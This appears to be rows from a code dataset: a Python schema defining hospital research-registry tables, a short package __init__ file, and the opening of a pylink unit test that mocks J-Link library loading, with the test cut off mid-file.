),
TableColumn(
name = "Reaction",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Comments",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Pat RPDR table
Pat = Table(
name = 'Pat',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Phy RPDR table
Phy = Table(
name = 'Phy',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Concept_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Result",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Units",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Prc RPDR table
Prc = Table(
name = 'Prc',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Procedure_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Procedure_Flag",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Quantity",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Prv RPDR table
Prv = Table(
name = 'Prv',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider_Rank",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Is_PCP",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Last_Seen_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Provider_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Provider_ID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Address_1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Address_2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "City",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "State",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Zip",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Phone_Ext",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Fax",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "EMail",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Specialties",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Enterprise_service",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "CPM_Id",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Pul RPDR table
Pul = Table(
name = 'Pul',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Rad RPDR table
Rad = Table(
name = 'Rad',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Rdt RPDR table
Rdt = Table(
name = 'Rdt',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Mode",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Group",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Accession_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Rnd RPDR table
Rnd = Table(
name = 'Rnd',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = False,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Accession",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Department",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Exam_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "History1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "History2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "History3",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Long_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rad1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rad2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rad3",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Req",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Division",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Region",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Specialty",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Body_Part",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "FileName",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# list of RPDR tables to consider
Tables = [
Car,
Con,
Dem,
Dia,
Dis,
Dpt,
Enc,
End,
Lab,
Lhm,
Lme,
Lno,
Lpr,
Lvs,
Med,
Mic,
Mrn,
Opn,
Pal,
Pal,
Pat,
Phy,
Prc,
Prv,
Pul,
Rad,
Rdt,
Rnd
]
| 31.516915
| 137
| 0.391586
| 9,376
| 163,037
| 6.774957
| 0.02933
| 0.092802
| 0.178962
| 0.197506
| 0.96036
| 0.959557
| 0.959557
| 0.959557
| 0.959447
| 0.959447
| 0
| 0.000308
| 0.52228
| 163,037
| 5,172
| 138
| 31.523009
| 0.815268
| 0.022271
| 0
| 0.927258
| 0
| 0
| 0.039457
| 0.001443
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0004
| 0
| 0.0004
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
64f055844ea24fe0be20309e7c0d331ccaa2e629
| 161
|
py
|
Python
|
hubward/__init__.py
|
raivivek/hubward
|
80d31d913bd062d8ec92ad20d132c3bfb132e652
|
[
"BSD-3-Clause"
] | null | null | null |
hubward/__init__.py
|
raivivek/hubward
|
80d31d913bd062d8ec92ad20d132c3bfb132e652
|
[
"BSD-3-Clause"
] | 1
|
2018-08-18T15:43:27.000Z
|
2018-08-26T02:32:09.000Z
|
hubward/__init__.py
|
raivivek/hubward
|
80d31d913bd062d8ec92ad20d132c3bfb132e652
|
[
"BSD-3-Clause"
] | null | null | null |
from . import utils
from . import liftover
from . import models
from . import generate_config_from_schema
from .log import log
from .version import __version__
| 20.125
| 41
| 0.807453
| 23
| 161
| 5.347826
| 0.434783
| 0.325203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15528
| 161
| 7
| 42
| 23
| 0.904412
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
56f93aac4965f9bad19d8b4eb389e45b48663101
| 34,197
|
py
|
Python
|
tests/unit/test_library.py
|
jn-yxy/pylink
|
651b0567cdc290e4ff7fbb2e1ff0923780e515d7
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_library.py
|
jn-yxy/pylink
|
651b0567cdc290e4ff7fbb2e1ff0923780e515d7
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_library.py
|
jn-yxy/pylink
|
651b0567cdc290e4ff7fbb2e1ff0923780e515d7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Square, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pylink.library as library
import pylink.util as util
import mock
import unittest
class TestLibrary(unittest.TestCase):
"""Unit test for the ``library`` submodule."""
def setUp(self):
"""Called before each test.
Performs setup.
Args:
self (TestLibrary): the ``TestLibrary`` instance
Returns:
``None``
"""
assertRaisesRegexp = getattr(self, 'assertRaisesRegexp', None)
self.assertRaisesRegexp = getattr(self, 'assertRaisesRegex', assertRaisesRegexp)
self.lib_path = '/'
def tearDown(self):
"""Called after each test.
Performs teardown.
Args:
self (TestLibrary): the ``TestLibrary`` instance
Returns:
``None``
"""
pass
def mock_directories(self, mock_os, structure, sep):
"""Mocks a directory structure.
This function is used to mock a directory structure, so that checking
if something is a file, is a directory, or listing directories will use
our mocked structure instead.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): the mocked ``os`` module
structure (list): a list of directories or files
sep (str): the operating system seperator
Returns:
``None``
"""
def isfile(f):
"""Returns whether the file exists in the structure."""
if not any(s.endswith(f) for s in structure):
return False
return '.' in f.split(sep)[-1]
mock_os.path.isfile.side_effect = isfile
def isdir(f):
"""Returns whether the directory exists within the structure."""
if not any(s.startswith(f) for s in structure):
return False
return not isfile(f)
mock_os.path.isdir.side_effect = isdir
def join(*args):
"""Joins several strings to form a path."""
s = ''
for arg in args:
if not s.endswith(sep) and len(s) > 0:
s += sep
s += arg
return s
mock_os.path.join.side_effect = join
def listdir(f):
"""List the files and directories within the directory."""
if not isdir(f):
return list()
directories = []
for s in structure:
if s.startswith(f):
s = s[len(f):]
if s.startswith(sep):
s = s[len(sep):]
directories.append(s.split(sep)[0])
return directories
mock_os.listdir.side_effect = listdir
def mock_walk(b):
r = list()
dirname = b
if not isdir(dirname):
return []
subdirs = filter(len, list(set([d for d in listdir(dirname) if isdir(join(dirname, d))])))
subfiles = filter(len, list(set([f for f in listdir(dirname) if isfile(join(dirname, f))])))
r.append((dirname, subdirs, subfiles))
for subdir in subdirs:
r.extend(mock_walk(join(dirname, subdir)))
return r
mock_os.walk.return_value = mock_walk(sep)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_initialize_default(self, mock_load_library, mock_find_library, mock_open):
"""Tests creating a library and finding the default DLL.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = self.lib_path
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
mock_open.assert_called_with(self.lib_path, 'rb')
